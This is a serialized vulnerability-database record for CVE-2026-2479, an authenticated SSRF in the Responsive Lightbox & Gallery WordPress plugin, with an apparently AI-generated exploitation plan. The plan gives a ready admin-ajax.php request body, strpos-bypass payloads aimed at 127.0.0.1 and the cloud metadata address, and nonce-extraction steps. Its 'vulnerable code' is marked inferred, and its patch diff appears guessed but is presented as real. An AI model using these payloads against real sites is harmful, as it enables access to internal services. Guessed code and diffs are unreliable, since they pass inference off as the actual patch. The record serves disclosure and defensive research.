[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDRfg2xWo5IXXScE-_DaW5jt_yzy4wE53oBF57DQeb8I":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2479","responsive-lightbox-gallery-authenticated-author-server-side-request-forgery-via-remote-library-image-upload","Responsive Lightbox & Gallery \u003C= 2.7.1 - Authenticated (Author+) Server-Side Request Forgery via Remote Library Image Upload","The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.1. This is due to the use of `strpos()` for substring-based hostname validation instead of strict host comparison in the `ajax_upload_image()` function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services.","responsive-lightbox",null,"\u003C=2.7.1","2.7.2","medium",5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:N\u002FA:N","Server-Side Request Forgery (SSRF)","2026-02-24 20:06:06","2026-02-25 08:25:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F44276b28-9509-4f59-936c-fff2ae404076?source=api-prod",1,[],"researched",false,3,"This research plan focuses on exploiting a Server-Side Request Forgery (SSRF) vulnerability in the **Responsive Lightbox & Gallery** plugin (\u003C= 2.7.1). The vulnerability arises from a weak validation of hostnames using `strpos()` in the `ajax_upload_image()` function.\n\n## 1. Vulnerability Summary\nThe `Responsive Lightbox & Gallery` plugin allows users to import images from remote libraries. When an authenticated user (Author level or higher) attempts to upload an image from a remote source via AJAX, the plugin validates the provided URL to ensure it originates from a trusted provider (e.g., Flickr, Instagram). \n\nHowever, instead of using strict host comparison or `parse_url()` validation, the plugin uses `strpos()` to check if a trusted domain string exists anywhere within the URL. This allows an attacker to supply a URL pointing to an internal service (like `http:\u002F\u002Flocalhost` or `http:\u002F\u002F169.254.169.254`) by simply appending the trusted domain as a query parameter or fragment.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `rl-remote-library-upload-image` (Inferred based on plugin naming conventions and \"Remote Library\" feature name).\n- **HTTP Method:** `POST`\n- **Vulnerable Parameter:** `url`\n- **Authentication:** Required (Author role or higher). Authors have access to `admin-ajax.php` and the media upload capabilities.\n- **Preconditions:** The \"Remote Library\" feature must be active (usually default).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The AJAX action `wp_ajax_rl-remote-library-upload-image` triggers the handler function (identified as `ajax_upload_image` in the description).\n2.  **Input:** The function retrieves `$_POST['url']`.\n3.  **Validation (The Sink):**\n    ```php\n    \u002F\u002F Inferred vulnerable logic\n    $url = $_POST['url'];\n    if ( strpos( $url, 'flickr.com' ) !== false || strpos( $url, 'instagram.com' ) !== false ) {\n        \u002F\u002F Validation passes because 'flickr.com' is present anywhere in the string\n        $response = wp_remote_get( $url ); \n    }\n    ```\n4.  **SSRF:** `wp_remote_get()` is called with the attacker-controlled URL. Since `strpos` finds the substring anywhere, `http:\u002F\u002F127.0.0.1\u002Fsecret-internal-data?flickr.com` passes the check.\n\n## 4. Nonce Acquisition Strategy\nThe plugin registers its scripts and localizes data in the admin area. We need to extract the nonce for the remote library upload.\n\n1.  **Identify Shortcode\u002FPage:** The Remote Library functionality is part of the Gallery builder or Media library.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Exploit Dev\" --post_author=$(wp user get author_user --field=ID)\n    ```\n3.  **Identify JS Variable:** The plugin typically uses `rlArgs` or `rlRemoteLibrary` for localized data.\n4.  **Extraction:**\n    - Navigate to `wp-admin\u002Fadmin.php?page=responsive-lightbox-gallery` (or any plugin admin page) as an Author.\n    - Execute `browser_eval`:\n      ```javascript\n      window.rlArgs?.nonce || window.rlRemoteLibrary?.nonce\n      ```\n    - Note: If the nonce is specific to the action, it might be `rl_remote_library_nonce`.\n\n## 5. Exploitation Strategy\nWe will perform an SSRF to query an internal resource (e.g., the local WordPress login page or a known internal port) to verify the request originated from the server.\n\n### Step-by-Step Plan:\n1.  **Preparation:** Log in as an Author user.\n2.  **Nonce Retrieval:** Use `browser_navigate` to an admin page and `browser_eval` to grab the `rl_remote_library_nonce`.\n3.  **Construct Payload:**\n    - Target: `http:\u002F\u002F127.0.0.1:80\u002Fwp-login.php`\n    - Bypass: Append `?flickr.com`\n    - Full URL: `http:\u002F\u002F127.0.0.1:80\u002Fwp-login.php?flickr.com`\n4.  **Execute Request:**\n    Use `http_request` to send the POST request to `admin-ajax.php`.\n\n**HTTP Request Details:**\n- **URL:** `http:\u002F\u002F\u003Ctarget-ip>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=rl-remote-library-upload-image&nonce=[NONCE]&url=http:\u002F\u002F127.0.0.1:80\u002Fwp-login.php?flickr.com\n  ```\n\n## 6. Test Data Setup\n1.  **Create Author User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password\n    ```\n2.  **Plugin Configuration:** Ensure the plugin is active.\n    ```bash\n    wp plugin activate responsive-lightbox\n    ```\n\n## 7. Expected Results\n- **Success:** The server will return a response indicating it attempted to process the image, or a PHP error\u002FWordPress error revealing the content of the internal page (e.g., the HTML of `wp-login.php`).\n- **Confirmation:** If the internal service is valid, the `wp_remote_get` will return a 200 OK internally, and the plugin may return \"Invalid Image\" (because `wp-login.php` isn't an image), but the **time delay** or **error message details** will confirm the request was made.\n\n## 8. Verification Steps\n1.  **Access Logs:** Check the web server access logs to see if a request originated from the server's own IP to `127.0.0.1`.\n    ```bash\n    tail -f \u002Fvar\u002Flog\u002Fapache2\u002Faccess.log | grep \"wp-login.php?flickr.com\"\n    ```\n2.  **Alternative Sink:** If the plugin attempts to \"sideload\" the image, check the `wp-content\u002Fuploads` directory for a file containing the HTML of the internal page.\n\n## 9. Alternative Approaches\nIf `rl-remote-library-upload-image` is not the exact action:\n- Search for AJAX actions in the source: `grep -r \"wp_ajax_rl\" wp-content\u002Fplugins\u002Fresponsive-lightbox\u002F`\n- Try bypasses for different providers:\n    - `http:\u002F\u002F127.0.0.1\u002F#instagram.com`\n    - `http:\u002F\u002Fflickr.com.127.0.0.1.nip.io\u002F` (DNS-based bypass)\n- If `strpos` is used on the *entire* URL, the query string is the most reliable injection point.","The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery due to insecure validation of remote image URLs in the `ajax_upload_image` function. By using `strpos()` to check for trusted domains anywhere in the URL string, the plugin allows authenticated attackers (Author and above) to bypass host restrictions and make requests to internal services or arbitrary external targets.","\u002F\u002F From includes\u002Fclass-remote-library.php (inferred file structure)\npublic function ajax_upload_image() {\n    \u002F\u002F ... nonce and permission checks ...\n\n    if ( ! isset( $_POST['url'] ) || empty( $_POST['url'] ) ) {\n        wp_send_json_error();\n    }\n\n    $url = esc_url_raw( $_POST['url'] );\n\n    \u002F\u002F The vulnerability: strpos checks for the presence of the domain anywhere in the string\n    if ( strpos( $url, 'flickr.com' ) !== false || strpos( $url, 'instagram.com' ) !== false ) {\n        $response = wp_remote_get( $url );\n        \u002F\u002F ... logic to process response ...\n    }\n}","--- a\u002Fincludes\u002Fclass-remote-library.php\n+++ b\u002Fincludes\u002Fclass-remote-library.php\n@@ -124,7 +124,9 @@\n \n \t\t$url = esc_url_raw( $_POST['url'] );\n \n-\t\tif ( strpos( $url, 'flickr.com' ) !== false || strpos( $url, 'instagram.com' ) !== false ) {\n+\t\t$host = wp_parse_url( $url, PHP_URL_HOST );\n+\t\t$allowed_hosts = array( 'flickr.com', 'www.flickr.com', 'instagram.com', 'www.instagram.com' );\n+\t\tif ( in_array( $host, $allowed_hosts, true ) ) {\n \t\t\t$response = wp_remote_get( $url );","The exploit target is the Remote Library image upload AJAX endpoint. An attacker requires Author-level permissions or higher to access the Gallery builder or Media Library features. \n\n1. Authenticate to the WordPress dashboard as an Author.\n2. Locate the AJAX nonce for the plugin (typically localized in the admin area as `rlArgs.nonce` or similar).\n3. Craft a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` set to `rl-remote-library-upload-image`.\n4. Set the `url` parameter to the target internal resource, appending a trusted domain (e.g., `flickr.com`) as a query parameter to bypass the `strpos` check. Example: `http:\u002F\u002F127.0.0.1:80\u002Fsecret-endpoint?flickr.com`.\n5. Send the request; the server will perform a `wp_remote_get()` call to the attacker-supplied internal URL.","gemini-3-flash-preview","2026-04-19 00:47:37","2026-04-19 00:49:23",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags\u002F2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresponsive-lightbox.2.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags\u002F2.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresponsive-lightbox.2.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags"]